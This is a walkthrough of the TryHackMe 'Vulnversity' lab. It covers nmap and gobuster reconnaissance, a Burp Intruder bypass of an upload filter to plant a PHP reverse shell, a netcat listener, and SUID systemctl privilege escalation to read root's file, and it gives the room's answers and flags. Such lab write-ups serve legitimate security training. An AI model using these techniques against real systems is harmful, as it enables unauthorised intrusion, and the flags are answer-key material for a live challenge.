Vulnversity — Walkthrough Tryhackme

Introduction

"Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing methodologies and tools. It includes tasks such as scanning, enumeration, exploitation, and post-exploitation techniques.

Task 1: Deploy the Machine

• Deploy the virtual machine provided in the room and note the IP address assigned

Task 2: Reconnaissance

Use 'Nmap ' to scan the target machine. Run a basic scan.

nmap -sC -sV         

We can see that ports 21, 22, 139, 445, 3128 and 3333 are open.

It is visible that the OS is Ubuntu, on which the WebServer(port 3333) is running.

Scan the box, how many ports are open?

Ans. 6

What version of the squid proxy is running on the machine?

Ans. 3.5.12

What is the most likely operating system this machine is running?

Ans. Ubuntu

What port is the web server running on?

Ans.3333

It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).

Ans. No answer needed

What is the flag for enabling verbose mode using Nmap?

Ans. -v

Task 3: Locating directories using Gobuster:

Gobuster is a tool used in penetration testing to search for hidden directories and files on web servers.

Also to used to brute-force URIs (directories and files), DNS subdomains, and virtual host names.

Gobuster flags include:

• -u or --url: specifies the target URL to be scanned.
• -w or --wordlist: specifies the path to the wordlist file to be used for brute-forcing directories and files.
• -s or --wildcard: enables or disables the use of wildcard responses.
• -e or --extensions: specifies the file extensions to search for in addition to common directory names.
• -x or --exclude-extensions: specifies the file extensions to exclude from the search.
• -r or --recursive: enables recursive directory brute-forcing.
• -k or --insecure: allows connections to SSL sites without verifying the certificate.
• -t or --threads: specifies the number of threads to use for the scan.
• -o or --output: specifies the output file to write the scan results to.
• -h or --help: displays the help menu.

To get started, you will need a wordlist for Gobuster (which will be used to quickly go through the wordlist to identify if a public directory is available. If you are using Kali Linux, you can find many wordlists under /usr/share/wordlists. You can also use the wordlist for directories located at /usr/share/wordlists/dirbuster/directory-list-1.0.txt in the AttackBox.

gobuster dir -u https://10.10.25.81:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
        

We discover an /internal directory and further investigation reveals an /internal/uploads directory.

What is the directory that has an upload form page?

Ans. /internal/

Task 4: Compromise the webserver

We try to upload a php reverse shell script but the extension is being filtered.

We start Burp Suite and enable it in FoxyProxy. Then, create a file with different PHP extensions for the Sniper attack.

We capture the upload request and then send it to Intruder.

We load our payload as a straightforward list.

We initiate our attack and obtain the results. Interestingly, every extension returns a Status 200, but the length of the .phtml extension differs from the others.

I uploaded a reverse PHP shell from PentestMonkey and accessed it at "/internal/uploads/rev-shell.phtml". I also configured a Netcat listener on TCP port 1234. Then, I modified the file extension to ".phtml".

We start a netcat listener: then visit Upload your shell and navigate to?https://10.10.25.81:3333/internal/uploads/php-reverse-shell.phtml - This will execute your payload.

nc -lvnp 1234        

What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.

Ans. .php

I understand the Burpsuite tool and its purpose during pentesting.

Ans. No answer needed

What extension is allowed after running the above exercise?

Ans. .phtml

While completing the above exercise, I have successfully downloaded the PHP reverse shell.

Ans. No answer needed

What is the name of the user who manages the webserver?

Ans. bill

cd /home 
ls
bash -i
cd bill
ls
cat user.txt
        

What is the user flag?

Ans. 8bd7992fbe8a6ad22a63361004cfcedb

Task 5: Privilege Escalation:

With the reverse shell in place, you need to escalate your privileges to gain full control of the machine. Check for any sudo privileges or SUID binaries that might be exploitable:

find / -perm -u=s -type f 2>/dev/null        

We notice that /bin/systemctl is a SUID binary, which we can leverage to obtain elevated privileges. Let's refer to GTFOBins and search for systemctl.

Reference: [https://gtfobins.github.io/gtfobins/systemctl/]

We create a temporary service and then use that to view root.txt file

TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF        

cd /tmp
cat output        

On the system, search for all SUID files. Which file stands out?

Ans. /bin/systemctl

What is the root flag value?

Ans. a58ff8579f0a9270368d33a9966c7fd5

Thank you very much for reading. I hope this is helpful to you. If you have any suggestions or something to add, feel free to contact me anytime.

Happy Hacking!